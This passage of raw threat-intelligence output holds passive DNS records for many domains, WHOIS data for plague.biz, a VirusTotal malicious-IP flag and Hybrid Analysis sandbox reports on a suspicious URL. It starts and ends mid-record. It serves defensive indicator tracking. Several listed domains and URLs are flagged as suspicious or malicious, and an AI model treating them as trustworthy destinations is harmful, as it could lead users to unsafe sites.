"A", "resolved_at": "2022-11-21T14:36:03.506000012Z"}, "lubas.us": {"record_type": "A", "resolved_at": "2022-12-16T23:11:13.296931014Z"}, "bonusverensiteler.bioref.org": {"record_type": "A", "resolved_at": "2022-11-27T16:14:09.324879695Z"}, "www.kazino-pinupofficial777.win": {"record_type": "A", "resolved_at": "2022-12-05T17:15:18.224020387Z"}, "lichterschmiede.net": {"record_type": "A", "resolved_at": "2022-09-22T17:21:16.137608886Z"}, "cpanel.marinecuador.com": {"record_type": "A", "resolved_at": "2022-12-01T13:38:55.110587853Z"}, "withsconworkgestbulde.tk": {"record_type": "A", "resolved_at": "2022-12-16T16:43:05.452660321Z"}, "www.pgslot918.biz": {"record_type": "A", "resolved_at": "2022-11-30T12:16:11.023163302Z"}, "athsnydam.tk": {"record_type": "A", "resolved_at": "2022-12-02T17:25:07.932475201Z"}, "saymulbestpropunes.cf": {"record_type": "A", "resolved_at": "2022-12-11T10:48:55.488158091Z"}, "www.academiadasapostas.pt": {"record_type": "A", "resolved_at": "2022-11-23T20:33:55.040238022Z"}, "niconwipekeds.tk": {"record_type": "A", "resolved_at": "2022-11-25T09:23:27.887903031Z"}, "quarrironarriou.ga": {"record_type": "A", "resolved_at": "2022-11-28T14:55:52.539164456Z"}, "mail.pixiebear.com": {"record_type": "A", "resolved_at": "2022-11-23T16:34:06.343236033Z"}, "www.dbmtea.com": {"record_type": "A", "resolved_at": "2022-12-13T13:19:07.335381102Z"}, "bayareapianist.com": {"record_type": "A", "resolved_at": "2022-11-25T13:07:30.409393420Z"}, "www.bouquinistescoop.com": {"record_type": "A", "resolved_at": "2022-11-20T13:08:22.358476063Z"}, "cleaningnearby.com": {"record_type": "A", "resolved_at": "2022-12-01T13:14:40.616159152Z"}, "yzc-hb.com": {"record_type": "A", "resolved_at": "2022-12-09T14:17:49.014689166Z"}, "gopr.bieszczady.pl": {"record_type": "A", "resolved_at": "2022-12-15T16:53:54.354395677Z"}, "be-online-st0cktrading-esgo-ok.live": {"record_type": "A", "resolved_at": "2022-12-04T15:28:45.315201663Z"}, "stephenbrennanfineart.com": {"record_type": "A", "resolved_at": "2022-12-01T14:08:12.037778155Z"}, "cpcontacts.watersavvysolutions.com": {"record_type": "A", "resolved_at": "2022-12-09T14:14:41.136484780Z"}, "wortdegorcothesack.cf": {"record_type": "A", "resolved_at": "2022-11-17T12:26:14.922670327Z"}, "www.cleaningnearby.com": {"record_type": "A", "resolved_at": "2022-12-15T13:10:28.707475111Z"}, "www.mudanzasya.com.uy": {"record_type": "CNAME", "resolved_at": "2022-11-13T17:48:38.483738331Z"}, "taruwanutondy.tk": {"record_type": "A", "resolved_at": "2022-12-12T12:54:05.281646687Z"}, "www.minionslovebananas.com": {"record_type": "A", "resolved_at": "2022-12-02T13:46:49.419451325Z"}, "cripto-coins.com": {"record_type": "A", "resolved_at": "2022-12-13T13:18:04.732183268Z"}, "www.laybetting.com.au": {"record_type": "A", "resolved_at": "2022-12-01T12:08:48.865560485Z"}, "cpcalendars.watersavvysolutions.com": {"record_type": "A", "resolved_at": "2022-12-13T14:29:38.631014889Z"}, "laybetting.com.au": {"record_type": "A", "resolved_at": "2022-12-10T12:09:48.597886439Z"}, "6v7trustee.shop": {"record_type": "A", "resolved_at": "2022-12-11T16:51:52.778197415Z"}, "www.gymlinefitnessclub.pl": {"record_type": "A", "resolved_at": "2022-11-27T16:17:26.248973900Z"}, "www.pixiebear.com": {"record_type": "A", "resolved_at": "2022-12-01T13:52:22.046061025Z"}, "createmvp.com": {"record_type": "A", "resolved_at": "2022-12-16T13:10:15.752194254Z"}, "finramphyfr.info": {"record_type": "A", "resolved_at": "2022-11-26T14:59:47.927967370Z"}, "www.mudanzasya.com.uy.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2022-12-02T16:01:57.325516068Z"}, "grupocasgo.com.mx": {"record_type": "A", "resolved_at": "2022-12-15T15:27:50.634816495Z"}, "apoetborn.com": {"record_type": "A", "resolved_at": "2022-12-13T12:56:53.614508807Z"}, "focape.com.br": {"record_type": "A", "resolved_at": "2022-11-23T12:48:13.212719732Z"}, "arbawarsumo.ml": {"record_type": "A", "resolved_at": "2022-12-08T15:19:10.909226369Z"}, "ponggolclinic.com": {"record_type": "A", "resolved_at": "2022-12-16T13:44:40.458959211Z"}, "www.californialicenselawblog.com": {"record_type": "A", "resolved_at": "2022-11-25T13:11:08.309437077Z"}, "www.nflfootballjerseys.us.org": {"record_type": "A", "resolved_at": "2022-11-26T16:49:44.449163363Z"}, "searchdoctors.org": {"record_type": "A", "resolved_at": "2022-11-20T16:44:30.416128833Z"}, "tifforagency.com": {"record_type": "A", "resolved_at": "2022-12-11T21:18:33.127348337Z"}, "pilgrimhostel.ru": {"record_type": "A", "resolved_at": "2022-11-27T16:24:55.059333564Z"}, "kyotonbirdringverdi.tk": {"record_type": "A", "resolved_at": "2022-12-02T17:25:05.716706275Z"}, "extrawoonruimte.nl": {"record_type": "A", "resolved_at": "2022-11-24T16:19:18.320871658Z"}, "hellzdarahlaubiobio.gq": {"record_type": "A", "resolved_at": "2022-12-05T14:57:21.683599366Z"}, "www.ambslotx.com": {"record_type": "A", "resolved_at": "2022-12-09T12:56:13.050645093Z"}, "villaline.com": {"record_type": "A", "resolved_at": "2022-11-23T17:07:30.365306849Z"}, "koolmaxx.com": {"record_type": "A", "resolved_at": "2022-12-12T00:28:23.989256710Z"}, "server.kuwaittimes.net": {"record_type": "A", "resolved_at": "2022-11-27T15:36:24.182716551Z"}, "fwebo.com": {"record_type": "A", "resolved_at": "2022-11-30T13:25:14.295759995Z"}, "www.bnssolutions.ca": {"record_type": "A", "resolved_at": "2022-11-30T12:28:00.226012205Z"}, "caitiomericasto.ga": {"record_type": "A", "resolved_at": "2022-12-15T14:47:43.300957673Z"}, "ccho.mobi": {"record_type": "A", "resolved_at": "2022-12-16T15:11:24.348760425Z"}, "imgonnet.com": {"record_type": "A", "resolved_at": "2022-11-22T13:42:43.182957909Z"}, "www.filmefarsi.com": {"record_type": "A", "resolved_at": "2022-10-25T15:10:23.252943579Z"}, "tioscapipwasing.gq": {"record_type": "A", "resolved_at": "2022-11-25T14:56:18.662116226Z"}, "bahissiteleri.bioref.org": {"record_type": "A", "resolved_at": "2022-12-08T16:38:46.488762657Z"}, "of-vocations-ok.live": {"record_type": "A", "resolved_at": "2022-12-07T15:43:19.629791588Z"}, "speedaruactela.ga": {"record_type": "A", "resolved_at": "2022-12-07T15:07:57.819689114Z"}, "cladmoderyra.ml": {"record_type": "A", "resolved_at": "2022-09-22T16:33:09.390342881Z"}, "designsbysuzie.com": {"record_type": "A", "resolved_at": "2022-11-19T13:13:19.808631318Z"}, "emcruses.tk": {"record_type": "A", "resolved_at": "2022-11-30T17:05:13.604881112Z"}, "tiesraide.lv": {"record_type": "A", "resolved_at": "2022-11-03T15:13:08.690745952Z"}, "equipmentwarehouseperth.com.au": {"record_type": "A", "resolved_at": "2022-12-07T12:11:16.305319180Z"}, "bouquinistescoop.com": {"record_type": "A", "resolved_at": "2022-11-26T13:09:15.777158229Z"}}, "names": ["grupopaulabellotti.com.br", "cpcontacts.watersavvysolutions.com", "kyotonbirdringverdi.tk", "mail.worldofwarcraftdating.site", "rouzzz.tk", "tiesraide.lv", "caitiomericasto.ga", "cpcalendars.watersavvysolutions.com", "quarrironarriou.ga", "www.filmefarsi.com", "imgonnet.com", "cleaningnearby.com", "jrsosa.net", "athsnydam.tk", "www.dbmtea.com", "tifforagency.com", "www.laybetting.co 104.21.19.243 2022-12-18 00:11:02 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: plague.biz Registry Domain ID: D8343439-BIZ Registrar WHOIS Server: whois.godaddy.com Registrar URL: whois.godaddy.com Updated Date: 2022-12-07T11:46:00Z Creation Date: 2004-12-02T07:26:37Z Registry Expiry Date: 2023-12-01T23:59:59Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Domains By Proxy, LLC Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Arizona Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: US Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: ns01.cashparking.com Name Server: ns02.cashparking.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:11:02Z <<< For more information on Whois status codes, please visit https://icann.org/epp The Service is provided so that you may look up certain information in relation to domain names that we store in our database. Use of the Service is subject to our policies, in particular you should familiarise yourself with our Acceptable Use Policy and our Privacy Policy. The information provided by this Service is 'as is' and we make no guarantee of it its accuracy. You agree that by your use of the Service you will not use the information provided by us in a way which is: * inconsistent with any applicable laws, * inconsistent with any policy issued by us, * to generate, distribute, or facilitate unsolicited mass email, promotions, advertisings or other solicitations, or * to enable high volume, automated, electronic processes that apply to the Service. You acknowledge that: * a response from the Service that a domain name is 'available', does not guarantee that is able to be registered, * we may restrict, suspend or terminate your access to the Service at any time, and * the copying, compilation, repackaging, dissemination or other use of the information provided by the Service is not permitted, without our express written consent. This information has been prepared and published in order to represent administrative and technical management of the TLD. We may discontinue or amend any part or the whole of these Terms of Service from time to time at our absolute discretion. Domain Name: PLAGUE.BIZ Registry Domain ID: D8343439-BIZ Registrar WHOIS Server: whois.godaddy.com Registrar URL: https://www.godaddy.com Updated Date: 2022-12-02T11:46:00Z Creation Date: 2004-12-02T07:26:37Z Registrar Registration Expiration Date: 2023-12-01T23:59:59Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Registry Registrant ID: CR19280635 Registrant Name: Registration Private Registrant Organization: Domains By Proxy, LLC Registrant Street: DomainsByProxy.com Registrant Street: 2155 E Warner Rd Registrant City: Tempe Registrant State/Province: Arizona Registrant Postal Code: 85284 Registrant Country: US Registrant Phone: +1.4806242599 Registrant Phone Ext: Registrant Fax: +1.4806242598 Registrant Fax Ext: Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=PLAGUE.BIZ Registry Admin ID: CR19280637 Admin Name: Registration Private Admin Organization: Domains By Proxy, LLC Admin Street: DomainsByProxy.com Admin Street: 2155 E Warner Rd Admin City: Tempe Admin State/Province: Arizona Admin Postal Code: 85284 Admin Country: US Admin Phone: +1.4806242599 Admin Phone Ext: Admin Fax: +1.4806242598 Admin Fax Ext: Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=PLAGUE.BIZ Registry Tech ID: CR19280636 Tech Name: Registration Private Tech Organization: Domains By Proxy, LLC Tech Street: DomainsByProxy.com Tech Street: 2155 E Warner Rd Tech City: Tempe Tech State/Province: Arizona Tech Postal Code: 85284 Tech Country: US Tech Phone: +1.4806242599 Tech Phone Ext: Tech Fax: +1.4806242598 Tech Fax Ext: Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=PLAGUE.BIZ Name Server: NS01.CASHPARKING.COM Name Server: NS02.CASHPARKING.COM DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:11:02Z <<< For more information on Whois status codes, please visit https://icann.org/epp TERMS OF USE: The data contained in this registrar's Whois database, while believed by the registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its accuracy. This information is provided for the sole purpose of assisting you in obtaining information about domain name registration records. Any use of this data for any other purpose is expressly forbidden without the prior written permission of this registrar. By submitting an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not to use this data to allow, enable, or otherwise support the dissemination or collection of this data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone, postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations of any kind, including spam. You further agree not to use this data to enable high volume, automated or robotic electronic processes designed to collect or compile this data for any purpose, including mining this data for your own personal or commercial purposes. Failure to comply with these terms may result in termination of access to the Whois database. These terms may be subject to modification at any time without notice. plague.biz 2022-12-18 00:41:56 Malicious IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [188.114.96.15] https://www.virustotal.com/en/ip-address/188.114.96.15/information/ 188.114.96.0/24 2022-12-18 00:04:59 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'172.67.190.129', u'104.18.47.230'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://w.epicedufinder.org/main/https:/www.google.com.hk/async/bgasy', u'signatures': [{u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-72', u'name': u'Overview of unique CLSIDs touched in registry', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" touched "MSAA AccPropServices" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\TREATAS")\n "iexplore.exe" touched "Task Bar Communication" (Path: "HKCU\\CLSID\\{56FDF344-FD6D-11D0-958A-006097C9A090}")\n "iexplore.exe" touched "Internet Explorer(Ver 1.0)" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{0002DF01-0000-0000-C000-000000000046}\\TREATAS")\n "iexplore.exe" touched "WebBrowserHandler Proxy" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{3CB169B3-17D9-4E47-8B93-2878998F69A2}\\TREATAS")\n "iexplore.exe" touched "Memory Mapped Cache Mgr" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\INPROCHANDLER32")\n "iexplore.exe" touched "Property System Both Class Factory" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\\INPROCHANDLER32")\n "iexplore.exe" touched "Shockwave Flash Object" (Path: "HKCU\\CLSID\\{D27CDB6E-AE6D-11CF-96B8-444553540000}\\INPROCSERVER32")\n "iexplore.exe" touched "Security Manager" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS")\n "iexplore.exe" touched "WinInetBroker Class" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\\TREATAS")\n "iexplore.exe" touched "NetworkListManager" (Path: "HKCU\\CLSID\\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\\TREATAS")\n "iexplore.exe" touched "Network List Manager" (Path: "HKCU\\CLSID\\{A47979D2-C419-11D9-A5B4-001185AD2B89}\\TREATAS")\n "iexplore.exe" touched "PSFactoryBuffer" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\\PROGID")\n "iexplore.exe" touched "Cor MIME Filter, CorFltr, CorFltr 1" (Path: "HKCU\\CLSID\\{1E66F26B-79EE-11D2-8710-00C04F79ED0D}\\INPROCSERVER32")\n "iexplore.exe" touched "DAO.TableDef.36" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00000103-0000-0010-8000-00AA006D2EA4}\\IMPLEMENTED CATEGORIES\\{00021493-0000-0000-C000-000000000046}")\n "iexplore.exe" touched "DAO.Group.36" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00000106-0000-0010-8000-00AA006D2EA4}\\IMPLEMENTED CATEGORIES\\{00021493-0000-0000-C000-000000000046}")\n "iexplore.exe" touched "StdOleLink" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00000300-0000-0000-C000-000000000046}\\IMPLEMENTED CATEGORIES\\{00021493-0000-0000-C000-000000000046}")\n "iexplore.exe" touched "FileMoniker" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00000303-0000-0000-C000-000000000046}\\IMPLEMENTED CATEGORIES\\{00021493-0000-0000-C000-000000000046}")\n "iexplore.exe" touched "ItemMoniker" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00000304-0000-0000-C000-000000000046}\\IMPLEMENTED CATEGORIES\\{00021493-0000-0000-C000-000000000046}")\n "iexplore.exe" touched "AntiMoniker" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00000305-0000-0000-C000-000000000046}\\IMPLEMENTED CATEGORIES\\{00021493-0000-0000-C000-000000000046}")\n "iexplore.exe" touched "Picture (Enhanced Metafile)" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00000319-0000-0000-C000-000000000046}\\IMPLEMENTED CATEGORIES\\{00021493-0000-0000-C000-000000000046}")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarDC3D.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarDBDD.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cacerts.digicert.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3708"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e7c_IE_EarlyTabStart_0x404_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e7c_ConnHashTable<3708>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e7c_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e7c_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_e7c_IESQMMUTEX_0_331"\n "IsoScope_e7c_IESQMMUTEX_0_519"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"172.67.190.129:443"\n "104.18.47.230:443"\n "23.38.131.139:443"\n "104.18.10.39:80"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"\n "~DFF663F8B6B105DB23.TMP" has type "data"\n "EI7URGJ3.txt" has type "ASCII text"\n "3C428B1A3E5F57D887EC4B864FAC5DCC" has type "data"\n "45YEAHUT.txt" has type "ASCII text"\n "6DB145CFEEC544B1582FED1ADA3370DD" has type "data"\n "69C6F6EC64E114822DF688DC12CDD86C" has type "data"\n "UIOD26AF.txt" has type "ASCII text"\n "v652eace1692a40cfa3763df669d7439c1639079717194_1_.js" has type "ASCII text with very long lines with no line terminators"\n "ver699.tmp" has type "XML 1.0 document UTF-8 Unicode (with BOM) text with CRLF line terminators"\n "en-US.3" has type "data"\n "CabDC3C.tmp" has type "Microsoft Cabinet archive data 60992 bytes 1 file"\n "DP2LZAOH.txt" has type "ASCII text"\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32"\n "~DF97D8837DD9091CE3.TMP" has type "data"\n "TarDC3D.tmp" has type "data"\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32"'}, {u'category': u'Environment Awareness', u'origin': u'Registry Access', u'identifier': u'registry-55', u'name': u'Reads the registry for installed applications', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\OUTLOOK.EXE")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\OUTLOOK.EXE"; Key: "PATH")\n "iexplore.exe" (Path: "HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\IEXPLORE.EXE")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\IEXPLORE.EXE"; Key: "DONTUSEDESKTOPCHANGEROUTER")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\IEXPLORE.EXE")'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://w.epicedufinder.org/main/https:/www.google.com.hk/async/bgasy"\n Pattern match: "https://w.epicedufinder.org"\n Heuristic match: "cacerts.digicert.com"\n Heuristic match: "GET /DigiCertGlobalRootG2.crt HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: cacerts.digicert.com"\n Pattern match: "www.google.com.hk/async/bgasy"\n Pattern match: "https://https:/www.google.com.hk/async/bgasy"\n Pattern match: "https://w.epicedufinder.org/main/https://https:/www.google.com.hk/async/bgasy"\n Pattern match: "https://w.epicedufinder.org/main/https://https:/www.google.com.hk/async/bgasy,timingsV2:{connectEnd:41.41243289612043,connectStart:41.41243289612043,domComplete:3646.0694075488404,domContentLoadedEventEnd:3644.7748906967736,domContentLoadedEven"\n Pattern match: "https://w.epicedufinder.org/main/https://https:/www.google.com.hk/async/bgasy,landingPath:,startTime:1647912420703,siteToken:c022214aaaa34cde9e6a2f9b26b7f9b8,st:2"\n Pattern match: "beacon.min.js/v652eace1692a40cfa3763df669d7439c1639079717194"\n Pattern match: 172.67.190.129 2022-12-18 00:12:26 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://188.114.97.3/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'String', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /beacon.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://188.114.97.3/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: performance.radar.cloudflare.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /beacon.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://188.114.97.3/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: performance.radar.cloudflare.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_b40_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b40_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_b40_ConnHashTable<2880>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_b40_IESQMMUTEX_0_303"\n "IsoScope_b40_IE_EarlyTabStart_0xcc4_Mutex"\n "IsoScope_b40_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2880"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b40_IESQMMUTEX_0_303"'}, {u'category': u'General', 